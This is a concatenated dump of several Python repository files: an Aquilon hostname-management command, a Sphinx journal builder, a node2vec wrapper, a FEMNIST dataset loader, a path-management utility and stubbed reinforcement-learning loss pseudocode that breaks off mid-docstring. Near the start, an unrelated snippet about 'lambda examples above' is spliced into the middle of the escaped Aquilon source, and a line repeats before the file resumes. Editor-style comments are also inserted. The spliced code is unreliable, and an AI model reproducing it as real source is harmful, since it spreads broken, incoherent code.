dbtarget_author)\n target_path = authored_sandbox.path\n else:\n target_path = os.path.join(domainsdir, dbtarget.name)\n\n # check if dbsource has anything uncommitted\n git_status = run_git([\"status\", \"--porcelain\"],\n path=source_path,\n logger=logger)\n if git_status:\n raise ArgumentError(\"The source {0:l} contains uncommitted files.\"\n .format(dbsource))\n\n # get latest source commit bit\n dbsource_commit = run_git(['rev-list', '--max-count=1', 'HEAD'],\n path=source_path, logger=logger)\n dbsource_commit = dbsource_commit.rstrip()\n if not dbsource_commit: # pragma: no cover\n raise ArgumentError(\"Unable to retrieve the git commit history from \"\n \"source branch {0:l}.\".format(dbsource))\n\n # make sure all commits in the source have been published.\n # we can check the latest commit bit from the source in template-king\n # any results returned will mean that all commits has been published\n kingdir = config.get(\"broker\", \"kingdir\")\n try:\n found = run_git(['cat-file', '-t', dbsource_commit],\n path=kingdir, logger=logger)\n found = found.strip()\n except ProcessException as pe:\n if pe.code != 128:\n raise\n else:\n found = None\n if found != 'commit':\n raise ArgumentError(\"The source {0:l} latest 
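# Two nits in the lambda examples above: `max = reduce(...)` shadows the
# built-in max(), and the reduction it performs is exactly what max() does:
from functools import reduce

lst3 = [5, 8, 10, 20, 50, 100]
largest = reduce(lambda a, b: a if a > b else b, lst3)
assert largest == max(lst3) == 100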
 if found != 'commit':\n raise ArgumentError(\"The source {0:l} latest commit has not been \"\n \"published to template-king yet.\".format(dbsource))\n\n # check if target branch has the latest source commit\n try:\n filterre = re.compile('^' + dbsource_commit + '$')\n found = run_git(['rev-list', 'HEAD'], filterre=filterre,\n path=target_path, logger=logger)\n except ProcessException as pe:\n if pe.code != 128:\n raise\n else:\n found = None\n if not found:\n raise ArgumentError(\"The target {0:l} does not contain the latest \"\n \"commit from source {1:l}.\".format(dbtarget,\n dbsource))\n\n\nclass CommandManageHostname(BrokerCommand):\n\n required_parameters = [\"hostname\"]\n\n def render(self, session, logger, hostname, domain, sandbox, force,\n **arguments):\n (dbbranch, dbauthor) = get_branch_and_author(session, logger,\n domain=domain,\n sandbox=sandbox,\n compel=True)\n\n if hasattr(dbbranch, \"allow_manage\") and not dbbranch.allow_manage:\n raise ArgumentError(\"Managing hosts to {0:l} is not allowed.\"\n .format(dbbranch))\n\n dbhost = hostname_to_host(session, hostname)\n dbsource = dbhost.branch\n dbsource_author = dbhost.sandbox_author\n old_branch = dbhost.branch.name\n\n if dbhost.cluster:\n raise ArgumentError(\"Cluster nodes must be managed at the \"\n \"cluster level; this host is a member of \"\n \"{0}.\".format(dbhost.cluster))\n\n if not force:\n validate_branch_commits(dbsource, dbsource_author,\n dbbranch, dbauthor, logger, self.config)\n\n dbhost.branch = dbbranch\n dbhost.sandbox_author = dbauthor\n session.add(dbhost)\n session.flush()\n plenary_host = PlenaryHost(dbhost, logger=logger)\n\n # We're crossing domains, need to lock everything.\n # XXX: There's a directory per domain. Do we need subdirectories\n # for different authors for a sandbox?\n key = CompileKey(logger=logger)\n\n try:\n lock_queue.acquire(key)\n\n plenary_host.stash()\n plenary_host.cleanup(old_branch, locked=True)\n\n # Now we recreate the plenary to ensure that the domain is ready\n # to compile, however (esp. if there was no existing template), we\n # have to be aware that there might not be enough information yet\n # with which we can create a template\n try:\n plenary_host.write(locked=True)\n except IncompleteError:\n # This template cannot be written, we leave it alone\n # It would be nice to flag the state in the host?\n pass\n except:\n # This will not restore the cleaned up files. 
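\n # (editor note) restore_stash() rolls back to the state saved by the\n # stash() call at the top of this try block.\n # 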
That's OK.\n # They will be recreated as needed.\n plenary_host.restore_stash()\n raise\n finally:\n lock_queue.release(key)\n\n return\n","repo_name":"gombasg/aquilon","sub_path":"lib/python2.6/aquilon/worker/commands/manage_hostname.py","file_name":"manage_hostname.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"1125155896","text":"\"\"\"This module controls building the journal from the entry sources\"\"\"\n\nimport os\nimport sys\nimport webbrowser\n\nfrom pyjournal2 import shell_util\n\n\nclass Entry:\n def __init__(self, topic, year, entry_date_num):\n self.topic = topic\n self.year = int(year)\n self.entry_date_num = entry_date_num\n\n def __str__(self):\n return f\"{self.topic}: {self.entry_date_num}\"\n\ndef get_source_dir(defs):\n \"\"\"return the directory where we put the sources\"\"\"\n return f\"{defs['working_path']}/journal-{defs['nickname']}/source/\"\n\n\ndef get_topics(defs):\n \"\"\"return a list of the currently known topics\"\"\"\n\n source_dir = get_source_dir(defs)\n\n topics = []\n other = []\n\n # get the list of directories in source/ -- these are the topics\n for d in os.listdir(source_dir):\n if os.path.isdir(os.path.join(source_dir, d)) and not d.startswith(\"_\"):\n topics.append(d)\n\n # remove todo -- it will be treated specially\n if \"todo\" in topics:\n topics.remove(\"todo\")\n other.append(\"todo\")\n\n if \"year_review\" in topics:\n topics.remove(\"year_review\")\n other.append(\"year_review\")\n\n return topics, other\n\n\ndef get_topic_entries(topic, defs):\n \"\"\"return a list of Entry objects for all the entries in topic\"\"\"\n\n cwd = os.getcwd()\n\n source_dir = get_source_dir(defs)\n tdir = os.path.join(source_dir, topic)\n\n os.chdir(tdir)\n\n # look over the directories here, they will be in the form YYYY-MM-DD\n entries = []\n\n for d in os.listdir(tdir):\n if os.path.isdir(os.path.join(tdir, d)):\n y, _, _ = d.split(\"-\")\n entries.append(Entry(topic, y, d))\n\n entries.sort(reverse=True, key=lambda e : e.entry_date_num)\n\n os.chdir(cwd)\n\n return entries\n\ndef get_most_recent_entries(topics, defs, *, N=25):\n \"\"\"return the N most recent entries, regardless of topic\"\"\"\n\n entries = []\n for t in topics:\n entries += get_topic_entries(t, defs)\n\n entries.sort(reverse=True, key=lambda e: e.entry_date_num)\n return entries[0:N]\n\ndef get_year_review_entries(defs):\n \"\"\"a year review is a special topic for a single year, this gets\n all of those year entries\n\n \"\"\"\n\n cwd = os.getcwd()\n\n source_dir = get_source_dir(defs)\n tdir = os.path.join(source_dir, \"year_review\")\n\n os.chdir(tdir)\n\n # look over the directories here, they will be in the form YYYY-MM-DD\n entries = []\n for f in os.listdir(tdir):\n if f.endswith(\".rst\") and f != \"years.rst\":\n entries.append(f)\n\n entries.sort(reverse=True)\n\n os.chdir(cwd)\n\n return entries\n\n\ndef create_topic(topic, defs):\n \"\"\"create a new topic directory\"\"\"\n\n source_dir = get_source_dir(defs)\n try:\n os.mkdir(os.path.join(source_dir, topic))\n except OSError:\n sys.exit(\"unable to create a new topic\")\n\n\ndef build(defs, show=0):\n \"\"\"build the journal. 
This entails writing the TOC files that link to\n the individual entries and then running the Sphinx make command\n\n \"\"\"\n\n source_dir = get_source_dir(defs)\n\n topics, other = get_topics(defs)\n\n latest_entries = get_most_recent_entries(topics, defs)\n\n # for each topic, we want to create a \"topic.rst\" that then has\n # things subdivided by year-month, and that a\n # \"topic-year-month.rst\" that includes the individual entries\n for topic in topics:\n\n entries = get_topic_entries(topic, defs)\n tdir = os.path.join(source_dir, topic)\n os.chdir(tdir)\n\n years = set(q.year for q in entries)\n years = list(years)\n years.sort(reverse=True)\n\n # we need to create ReST files of the form YYYY.rst. These\n # will each then contain the links to the entries for that\n # year\n for y in years:\n y_entries = [q for q in entries if q.year == y]\n\n with open(f\"{y}.rst\", \"w\") as yf:\n yf.write(\"****\\n\")\n yf.write(f\"{y}\\n\")\n yf.write(\"****\\n\\n\")\n\n yf.write(\".. toctree::\\n\")\n yf.write(\" :maxdepth: 2\\n\")\n yf.write(\" :caption: Contents:\\n\\n\")\n\n for entry in y_entries:\n yf.write(f\" {entry.entry_date_num}/{entry.entry_date_num}.rst\\n\")\n\n # now write the topic.rst\n with open(f\"{topic}.rst\", \"w\") as tf:\n tf.write(len(topic)*\"*\" + \"\\n\")\n tf.write(f\"{topic}\\n\")\n tf.write(len(topic)*\"*\" + \"\\n\")\n\n tf.write(\".. toctree::\\n\")\n tf.write(\" :maxdepth: 2\\n\")\n tf.write(\" :caption: Contents:\\n\\n\")\n\n for y in years:\n tf.write(f\" {y}.rst\\n\")\n\n # handle the year review now\n if \"year_review\" in other:\n tdir = os.path.join(source_dir, \"year_review\")\n os.chdir(tdir)\n entries = get_year_review_entries(defs)\n\n with open(\"years.rst\", \"w\") as tf:\n topic = \"year review\"\n tf.write(len(topic)*\"*\" + \"\\n\")\n tf.write(f\"{topic}\\n\")\n tf.write(len(topic)*\"*\" + \"\\n\")\n\n tf.write(\".. toctree::\\n\")\n tf.write(\" :maxdepth: 2\\n\")\n tf.write(\" :caption: Contents:\\n\\n\")\n\n for e in entries:\n tf.write(f\" {e}\\n\")\n\n # handle the most recent\n os.chdir(source_dir)\n with open(\"recent.rst\", \"w\") as tf:\n topic = \"recent entries\"\n tf.write(len(topic)*\"*\" + \"\\n\")\n tf.write(f\"{topic}\\n\")\n tf.write(len(topic)*\"*\" + \"\\n\")\n\n tf.write(\".. toctree::\\n\")\n tf.write(\" :maxdepth: 1\\n\")\n tf.write(\" :caption: Contents:\\n\\n\")\n\n for e in latest_entries:\n tf.write(f\" {e} <{e.topic}/{e.entry_date_num}/{e.entry_date_num}.rst>\\n\")\n\n # now write the index.rst\n os.chdir(source_dir)\n with open(\"index.rst\", \"w\") as mf:\n mf.write(\"Research Journal\\n\")\n mf.write(\"================\\n\\n\")\n\n mf.write(\".. toctree::\\n\")\n mf.write(\" :maxdepth: 1\\n\")\n mf.write(\" :caption: Summaries:\\n\\n\")\n\n mf.write(\" recent.rst\\n\")\n\n if \"todo\" in other:\n mf.write(\" todo/todo.rst\\n\")\n\n if \"year_review\" in other:\n mf.write(\" year_review/years.rst\\n\")\n\n mf.write(\".. 
toctree::\\n\")\n mf.write(\" :maxdepth: 1\\n\")\n mf.write(\" :caption: Topics:\\n\\n\")\n\n for topic in sorted(topics):\n mf.write(f\" {topic}/{topic}\\n\")\n\n mf.write(\"\\n\")\n mf.write(\"Indices and tables\\n\")\n mf.write(\"==================\\n\\n\")\n mf.write(\"* :ref:`genindex`\\n\")\n mf.write(\"* :ref:`modindex`\\n\")\n mf.write(\"* :ref:`search`\\n\")\n\n # now do the building\n build_dir = \"{}/journal-{}/\".format(defs[\"working_path\"], defs[\"nickname\"])\n os.chdir(build_dir)\n\n _, _, rc = shell_util.run(\"make clean\")\n _, _, rc = shell_util.run(\"make -j 3 html\")\n\n if rc != 0:\n print(\"build may have been unsuccessful\")\n\n index = os.path.join(build_dir, \"build/html/index.html\")\n\n # use webbrowser module\n if show == 1:\n webbrowser.open_new_tab(index)\n","repo_name":"zingale/pyjournal2","sub_path":"pyjournal2/build_util.py","file_name":"build_util.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24115039272","text":"import settings\r\nimport const\r\nimport os\r\nimport re\r\nimport subprocess\r\nfrom src.methods.node2vec import Node2Vec\r\nimport networkx\r\n\r\ndef graph_load(path, is_directed=False):\r\n graph_type = networkx.DiGraph() if is_directed else networkx.Graph()\r\n graph = networkx.readwrite.edgelist.read_weighted_edgelist(path, create_using=graph_type)\r\n return graph\r\n\r\ndef embed_py(graph_path, output_path, is_windows=True, is_directed=False, dimension=20, walk_length=60, nb_of_walk_per_source=12, window_size=5):\r\n graph = graph_load(graph_path, is_directed)\r\n node2vec = Node2Vec(graph, dimension, walk_length, nb_of_walk_per_source, workers=1)\r\n model = node2vec.fit(window=window_size, min_count=1, batch_words=4)\r\n model.wv.save_word2vec_format(output_path)\r\n\r\ndef embed_cpp(graph_path, output_path, is_windows=True, is_directed=False, dimension=20, walk_length=60, nb_of_walk_per_source=12, p=1, q=1):\r\n # node2vec -i:graph/karate.edgelist -o:emb/karate.emb -l:3 -d:24 -p:0.3 -dr -v\r\n node2vec_path = settings.config[const.NODE_TO_VEC]\r\n command_list = [win_to_cygwin(node2vec_path) if is_windows else node2vec_path,\r\n '-i:' + (win_to_cygwin(graph_path) if is_windows else graph_path),\r\n '-o:' + (win_to_cygwin(output_path) if is_windows else output_path),\r\n '-d:%d' % dimension,\r\n '-p:%f' % p, '-q:%f' % q, '-l:%d' % walk_length, '-r:%d' % nb_of_walk_per_source, '-w', '-v']\r\n if is_directed:\r\n command_list.append(\"-dr\")\r\n command = \" \".join(command_list)\r\n if is_windows:\r\n # Call the configured shell from windows cmd to run node2vec.exe\r\n command = \"%s -l -c \\\"%s\\\"\" % (settings.config[const.SHELL], command)\r\n print('Execute: %s' % command)\r\n proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\r\n for line in proc.stdout.readlines():\r\n print(line)\r\n return proc.wait()\r\n\r\ndef win_to_cygwin(path: str):\r\n return \"/cygdrive/\" + path[0:1].lower() + path[2:].replace(\"\\\\\", \"/\")\r\n\r\nif __name__ == '__main__':\r\n embed_cpp(graph_path=settings.config[const.SLASHDOT_3TYPE_TRAIN],\r\n output_path=settings.config[const.SLASHDOT_3TYPE_OUTPUT],\r\n is_directed=False)\r\n embed_cpp(graph_path=settings.config[const.SLASHDOT_UNSIGNED_TRAIN],\r\n output_path=settings.config[const.SLASHDOT_UNSIGNED_OUTPUT],\r\n 
is_directed=False)\r\n","repo_name":"AminJavari/ROSE","sub_path":"src/methods/mynode2vec.py","file_name":"mynode2vec.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7283276122","text":"\"\"\"FEMNIST dataset creation module.\"\"\"\n\n\nimport pathlib\nfrom logging import INFO\nfrom typing import List, Tuple\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torchvision.transforms as transforms\nfrom flwr.common.logger import log\nfrom PIL import Image\nfrom sklearn import preprocessing\nfrom torch.utils.data import DataLoader, Dataset, Subset, random_split\n\nfrom flwr_baselines.publications.leaf.femnist.dataset.nist_preprocessor import (\n NISTPreprocessor,\n)\nfrom flwr_baselines.publications.leaf.femnist.dataset.nist_sampler import NistSampler\nfrom flwr_baselines.publications.leaf.femnist.dataset.zip_downloader import (\n ZipDownloader,\n)\n\n\nclass NISTLikeDataset(Dataset):\n \"\"\"Dataset representing NIST or preprocessed variant of it.\"\"\"\n\n def __init__(\n self,\n image_paths: List[pathlib.Path],\n labels: np.ndarray,\n transform: transforms = transforms.ToTensor(),\n ) -> None:\n self.image_paths = image_paths\n self.labels = labels\n self.transform = transforms.ToTensor() if transform is None else transform\n\n def __len__(self) -> int:\n return len(self.image_paths)\n\n def __getitem__(self, index: int) -> Tuple[torch.Tensor, torch.Tensor]:\n image_path = self.image_paths[index]\n label = self.labels[index]\n image = Image.open(image_path)\n if self.transform:\n image = self.transform(image)\n label = torch.tensor(label)\n return image, label\n\n\ndef create_dataset(df_info: pd.DataFrame, labels: np.ndarray) -> NISTLikeDataset:\n \"\"\"Instantiate NISTLikeDataset.\n\n Parameters\n ----------\n df_info: pd.DataFrame\n contains paths to images\n labels: np.ndarray\n 0 till N-1 classes labels in the same order as in df_info\n\n Returns\n -------\n nist_like_dataset: NISTLikeDataset\n created dataset\n \"\"\"\n nist_like_dataset = NISTLikeDataset(df_info[\"path\"].values, labels)\n return nist_like_dataset\n\n\ndef create_partition_list(df_info: pd.DataFrame) -> List[List[int]]:\n \"\"\"\n Create list of list with int masks identifying writers.\n Parameters\n ----------\n df_info: pd.DataFrame\n contains writer_id information\n\n Returns\n -------\n division_list: List[List[int]]\n List of lists of indices to identify unique writers\n \"\"\"\n writers_ids = df_info[\"writer_id\"].values\n unique_writers = np.unique(writers_ids)\n indices = {\n writer_id: np.where(writers_ids == writer_id)[0].tolist()\n for writer_id in unique_writers\n }\n return list(indices.values())\n\n\ndef partition_dataset(\n dataset: Dataset, division_list: List[List[int]]\n) -> List[Dataset]:\n \"\"\"\n Partition dataset for niid settings - by writer id (each partition has only single writer data).\n Parameters\n ----------\n dataset: Dataset\n dataset of all images\n division_list: List[List[int]]\n list of lists of indices to identify unique writers\n\n Returns\n -------\n subsets: List[Dataset]\n subsets of datasets divided by writer id\n \"\"\"\n subsets = []\n for sequence in division_list:\n subsets.append(Subset(dataset, sequence))\n return subsets\n\n\n# pylint: disable=too-many-locals\ndef train_valid_test_partition(\n partitioned_dataset: List[Dataset],\n train_split: float = 0.9,\n validation_split: float = 0.0,\n test_split: float = 0.1,\n random_seed: int = None,\n) -> 
Tuple[List[Dataset], List[Dataset], List[Dataset]]:\n \"\"\"Partition list of datasets to train, validation and test splits (each\n dataset from the list individually).\n\n Parameters\n ----------\n partitioned_dataset: List[Dataset]\n partitioned datasets\n train_split: float\n part of the data used for training\n validation_split: float\n part of the data used for validation\n test_split: float\n part of the data used for testing\n random_seed: int\n seed for data splitting\n\n Returns\n -------\n (train, validation, test): Tuple[List[Dataset], List[Dataset], List[Dataset]]\n split datasets\n \"\"\"\n train_subsets = []\n validation_subsets = []\n test_subsets = []\n\n for subset in partitioned_dataset:\n subset_len = len(subset)\n train_len = int(train_split * subset_len)\n # Do this checkup for full dataset use\n # Consider the case sample size == 5 and\n # train_split = 0.5 test_split = 0.5\n # if such check as below is not performed\n # one sample will be missing\n if validation_split == 0.0:\n test_len = subset_len - train_len\n val_len = 0\n else:\n test_len = int(test_split * subset_len)\n val_len = subset_len - train_len - test_len\n train_dataset, validation_dataset, test_dataset = random_split(\n subset,\n lengths=[train_len, val_len, test_len],\n generator=torch.Generator().manual_seed(random_seed),\n )\n train_subsets.append(train_dataset)\n validation_subsets.append(validation_dataset)\n test_subsets.append(test_dataset)\n return train_subsets, validation_subsets, test_subsets\n\n\ndef transform_datasets_into_dataloaders(\n datasets: List[Dataset], **dataloader_kwargs\n) -> List[DataLoader]:\n \"\"\"\n Transform datasets into dataloaders.\n Parameters\n ----------\n datasets: List[Dataset]\n list of datasets\n dataloader_kwargs\n arguments to DataLoader\n\n Returns\n -------\n dataloader: List[DataLoader]\n list of dataloaders\n \"\"\"\n dataloaders = []\n for dataset in datasets:\n dataloaders.append(DataLoader(dataset, **dataloader_kwargs))\n return dataloaders\n\n\n# pylint: disable=too-many-arguments\ndef create_federated_dataloaders(\n sampling_type: str,\n dataset_fraction: float,\n batch_size: int,\n train_fraction: float,\n validation_fraction: float,\n test_fraction: float,\n random_seed: int,\n) -> Tuple[List[DataLoader], List[DataLoader], List[DataLoader]]:\n \"\"\"Create the federated dataloaders by following all the preprocessing\n steps and division.\n\n Parameters\n ----------\n sampling_type: str\n \"niid\" or \"iid\"\n dataset_fraction: float\n fraction of the total data that will be used for sampling\n batch_size: int\n batch size\n train_fraction, validation_fraction, test_fraction: float\n fraction of each local dataset used for training, validation, testing\n random_seed: int\n random seed for data shuffling\n\n Returns\n -------\n \"\"\"\n if train_fraction + validation_fraction + test_fraction != 1.0:\n raise ValueError(\n \"The fraction of train, validation and test should add up to 1.0.\"\n )\n # Download and unzip the data\n log(INFO, \"NIST data downloading started\")\n nist_by_class_url = \"https://s3.amazonaws.com/nist-srd/SD19/by_class.zip\"\n nist_by_writer_url = \"https://s3.amazonaws.com/nist-srd/SD19/by_write.zip\"\n nist_by_class_downloader = ZipDownloader(\"by_class\", \"data/raw\", nist_by_class_url)\n nist_by_writer_downloader = ZipDownloader(\n \"by_write\", \"data/raw\", nist_by_writer_url\n )\n nist_by_class_downloader.download()\n nist_by_writer_downloader.download()\n log(INFO, \"NIST data downloading done\")\n\n # Preprocess the 
data\n log(INFO, \"Preprocessing of the NIST data started\")\n nist_data_path = pathlib.Path(\"data\")\n nist_preprocessor = NISTPreprocessor(nist_data_path)\n nist_preprocessor.preprocess()\n log(INFO, \"Preprocessing of the NIST data done\")\n\n # Create information for sampling\n log(INFO, \"Creation of the sampling information started\")\n df_info_path = pathlib.Path(\"data/processed_FeMNIST/processed_images_to_labels.csv\")\n df_info = pd.read_csv(df_info_path, index_col=0)\n sampler = NistSampler(df_info)\n sampled_data_info = sampler.sample(\n sampling_type, dataset_fraction, random_seed=random_seed\n )\n sampled_data_info_path = pathlib.Path(\n f\"data/processed_FeMNIST/{sampling_type}_sampled_images_to_labels.csv\"\n )\n sampled_data_info.to_csv(sampled_data_info_path)\n log(INFO, \"Creation of the sampling information done\")\n\n # Create a list of DataLoaders\n log(INFO, \"Creation of the partitioned by writer_id PyTorch Datasets started\")\n sampled_data_info = pd.read_csv(sampled_data_info_path)\n label_encoder = preprocessing.LabelEncoder()\n labels = label_encoder.fit_transform(sampled_data_info[\"character\"])\n full_dataset = create_dataset(sampled_data_info, labels)\n division_list = create_partition_list(sampled_data_info)\n partitioned_dataset = partition_dataset(full_dataset, division_list)\n (\n partitioned_train,\n partitioned_validation,\n partitioned_test,\n ) = train_valid_test_partition(\n partitioned_dataset,\n random_seed=random_seed,\n train_split=train_fraction,\n validation_split=validation_fraction,\n test_split=test_fraction,\n )\n trainloaders = transform_datasets_into_dataloaders(\n partitioned_train, batch_size=batch_size\n )\n valloaders = transform_datasets_into_dataloaders(\n partitioned_validation, batch_size=batch_size\n )\n testloaders = transform_datasets_into_dataloaders(\n partitioned_test, batch_size=batch_size\n )\n log(INFO, \"Creation of the partitioned by writer_id PyTorch Datasets done\")\n return trainloaders, valloaders, testloaders\n","repo_name":"adap/flower","sub_path":"baselines/flwr_baselines/flwr_baselines/publications/leaf/femnist/dataset/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":9487,"program_lang":"python","lang":"en","doc_type":"code","stars":3287,"dataset":"github-code","pt":"61"} +{"seq_id":"1125155896","text":"import os\nimport time\nfrom enum import Enum, unique\nfrom typing import Any\n\nfrom utils.objectIO import pickle_mkdir_save, pickle_load, touch_file, create_path\n\n# Optimizations still to be implemented:\n# migrate milestone contents under the corresponding checkpoint model\n# checkout: create the directory when it does not exist\n# implement object serialization and deserialization\nsimp_time_stamp_index1 = 5\nsimp_time_stamp_index2 = 10\nst3 = 11\nst4 = 14\nst5 = 17\n\n\n@unique\nclass FileType(Enum):\n # MODEL_TYPE = '.pt'\n # CONFIG_TYPE = '.yml'\n IMG_TYPE = '.png'\n LOG_TYPE = '.log'\n EXP_TYPE = '.txt'\n SEQ_TYPE = '.seq'\n CHECKPOINT_TYPE = '.snap'\n\n\ndef curt_time_stamp(simp: bool = False):\n pattern = '%Y.%m.%d_%H-%M-%S'\n time_str = time.strftime(pattern, time.localtime(time.time()))\n if simp:\n return time_str[simp_time_stamp_index1: simp_time_stamp_index2]\n else:\n return time_str\n\n\ndef only_time_stamp():\n pattern = '%Y.%m.%d_%H-%M-%S'\n time_str = time.strftime(pattern, time.localtime(time.time()))\n return time_str[st3: st3 + 2] + time_str[st4: st4 + 2] + time_str[st5: st5 + 2]\n\n\ndef file_name(file_type: FileType, name: str = None, ext_time: bool = True) -> str:\n if name is None:\n return f\"{curt_time_stamp()}{file_type.value}\"\n else:\n if ext_time:\n return 
f\"{name}_{only_time_stamp()}---{curt_time_stamp(ext_time)}{file_type.value}\"\n else:\n return f\"{name}{file_type.value}\"\n\n\nclass PathManager:\n ERROR_MESS1 = \"Given directory doesn't exists.\"\n ERROR_MESS2 = \"Given key doesn't exists.\"\n\n def __init__(self, model_path: str, dataset_path: str):\n self.model_path: str = model_path\n self.dataset_path: str = dataset_path\n\n self.image_path = None\n self.mile_path = None\n self.log_path = None\n self.exp_path = None\n self.checkpoint_path = None\n\n self.curt_id = 0\n self.reg_path = []\n\n @staticmethod\n def load(path: str) -> Any:\n return pickle_load(path)\n\n @staticmethod\n def store(obj: Any, path: str):\n pickle_mkdir_save(obj, path)\n\n def derive_path(self, exp_base: str, image_base: str, milestone_base: str, log_base: str):\n path_base, file = os.path.split(self.model_path)\n _file_name, file_postfix = os.path.splitext(file)\n self.image_path = os.path.join(image_base, _file_name)\n self.mile_path = os.path.join(milestone_base, _file_name)\n self.log_path = os.path.join(log_base, _file_name)\n self.exp_path = os.path.join(exp_base, _file_name)\n self.checkpoint_path = path_base\n\n def fetch_path(self, path_id: int) -> str:\n return self.reg_path[path_id]\n\n def is_new(self, new: str) -> bool:\n for path in self.reg_path:\n if path == new:\n return False\n return True\n\n def sync_path(self, path: str) -> int:\n create_path(path)\n if self.is_new(path):\n self.reg_path.append(path)\n self.curt_id += 1\n ret = self.reg_path.index(path)\n return ret\n\n def latest_path(self) -> str:\n return self.fetch_path(self.curt_id - 1)\n\n def new_log(self, name: str = None) -> (str, int):\n new_file = os.path.join(self.log_path, file_name(FileType.LOG_TYPE, name))\n touch_file(new_file)\n file_id = self.sync_path(new_file)\n return new_file, file_id\n\n def new_img(self, name: str = None) -> (str, int):\n new_file = os.path.join(self.image_path, file_name(FileType.IMG_TYPE, name))\n file_id = self.sync_path(new_file)\n return new_file, file_id\n\n def new_checkpoint(self, name: str = None, fixed: bool = False) -> (str, int):\n new_file = os.path.join(self.checkpoint_path,\n file_name(FileType.CHECKPOINT_TYPE, name, not fixed))\n file_id = self.sync_path(new_file)\n return new_file, file_id\n\n def new_exp(self, name: str = None) -> (str, int):\n new_file = os.path.join(self.exp_path, file_name(FileType.EXP_TYPE, name))\n file_id = self.sync_path(new_file)\n return new_file, file_id\n\n def new_seq(self, name: str = None) -> (str, int):\n new_file = os.path.join(self.mile_path, file_name(FileType.SEQ_TYPE, name))\n file_id = self.sync_path(new_file)\n return new_file, file_id\n","repo_name":"Wolfsion/FedLA","sub_path":"utils/PathManager.py","file_name":"PathManager.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23272767866","text":"\"\"\"Library for RL losses.\"\"\"\nimport collections\n\nimport numpy as np\n\n\nOBSERVATION_FIELDS = [\n 'game_seconds', # Game timer in seconds.\n]\n\nACTION_FIELDS = [\n 'action_type', # Action taken.\n # Other fields, e.g. 
arguments, repeat, delay, queued.\n]\n\nTRAJECTORY_FIELDS = [\n 'observation', # Player observation.\n 'opponent_observation', # Opponent observation, used for value network.\n 'state', # State of the agent (used for initial LSTM state).\n 'z', # Conditioning information for the policy.\n 'is_final', # If this is the last step.\n # namedtuple of masks for each action component. 0/False if final_step of\n # trajectory, or the argument is not used; else 1/True.\n 'masks',\n 'action', # Action taken by the agent.\n 'behavior_logits', # namedtuple of logits of the behavior policy.\n 'teacher_logits', # namedtuple of logits of the supervised policy.\n 'reward', # Reward for the agent after taking the step.\n]\n\nTrajectory = collections.namedtuple('Trajectory', TRAJECTORY_FIELDS)\n\n\ndef log_prob(actions, logits):\n \"\"\"Returns the log probability of taking an action given the logits.\"\"\"\n # Equivalent to tf.sparse_softmax_cross_entropy_with_logits.\n\n\ndef is_sampled(z):\n \"\"\"Takes a tensor of zs. Returns a mask indicating which z's are sampled.\"\"\"\n\n\ndef filter_by(action_fields, target):\n \"\"\"Returns the subset of `target` corresponding to `action_fields`.\n\n Autoregressive actions are composed of many logits. We often want to select a\n subset of these logits.\n\n Args:\n action_fields: One of 'action_type', 'delay', or 'arguments'.\n target: A list of tensors corresponding to the SC2 action spec.\n Returns:\n A list corresponding to a subset of `target`, with only the tensors relevant\n to `action_fields`.\n \"\"\"\n\n\ndef compute_over_actions(f, *args):\n \"\"\"Runs f over all elements in the lists composing *args.\n\n Autoregressive actions are composed of many logits. We run loss functions\n over all sets of logits.\n \"\"\"\n return sum(f(*a) for a in zip(*args))\n\n\ndef entropy(policy_logits, mask):\n # (editor fix) entropy_loss passes a mask alongside each set of logits; the\n # original pseudocode omitted this parameter. Masking here is an assumption.\n policy = softmax(policy_logits)\n log_policy = logsoftmax(policy_logits)\n ent = np.sum(-policy * log_policy, axis=-1) # Aggregate over actions.\n # Normalize by actions available.\n normalized_entropy = ent / np.log(policy_logits.shape[-1])\n return normalized_entropy * mask\n\n\ndef entropy_loss(policy_logits, masks):\n \"\"\"Computes the entropy loss for a set of logits.\n\n Args:\n policy_logits: namedtuple of the logits for each policy argument.\n Each shape is [..., N_i].\n masks: The masks. 
Each shape is policy_logits.shape[:-1].\n Returns:\n Per-example entropy loss, as an array of shape policy_logits.shape[:-1].\n \"\"\"\n return np.mean(compute_over_actions(entropy, policy_logits, masks))\n\n\ndef kl(student_logits, teacher_logits, mask):\n s_logprobs = logsoftmax(student_logits)\n t_logprobs = logsoftmax(teacher_logits)\n teacher_probs = softmax(teacher_logits)\n return teacher_probs * (t_logprobs - s_logprobs) * mask\n\n\ndef human_policy_kl_loss(trajectories, kl_cost, action_type_kl_cost):\n \"\"\"Computes the KL loss to the human policy.\n\n Args:\n trajectories: The trajectories.\n kl_cost: A float; the weighting to apply to the KL cost to the human policy.\n action_type_kl_cost: Additional cost applied to action_types for\n conditioned policies.\n Returns:\n Per-example entropy loss, as an array of shape policy_logits.shape[:-1].\n \"\"\"\n student_logits = trajectories.behavior_logits\n teacher_logits = trajectories.teacher_logits\n masks = trajectories.masks\n kl_loss = compute_over_actions(kl, student_logits, teacher_logits, masks)\n\n # We add an additional KL-loss on only the action_type for the first 4 minutes\n # of each game if z is sampled.\n game_seconds = trajectories.observation.game_seconds\n action_type_mask = masks.action_type & (game_seconds > 4 * 60)\n action_type_mask = action_type_mask & is_sampled(trajectories.z)\n action_type_loss = kl(student_logits.action_type, teacher_logits.action_type,\n action_type_mask)\n return (kl_cost * np.mean(kl_loss)\n + action_type_kl_cost * np.mean(action_type_loss))\n\n\ndef lambda_returns(values_tp1, rewards, discounts, lambdas):\n \"\"\"Computes lambda returns.\n\n Refer to the following for a similar function:\n https://github.com/deepmind/trfl/blob/2c07ac22512a16715cc759f0072be43a5d12ae45/trfl/value_ops.py#L74\n \"\"\"\n\n\ndef generalized_lambda_returns(rewards,\n pcontinues,\n values,\n bootstrap_value,\n lambda_=1,\n name=\"generalized_lambda_returns\"):\n \"\"\"Computes lambda-returns along a batch of (chunks of) trajectories.\n For lambda=1 these will be multistep returns looking ahead from each\n state to the end of the chunk, where bootstrap_value is 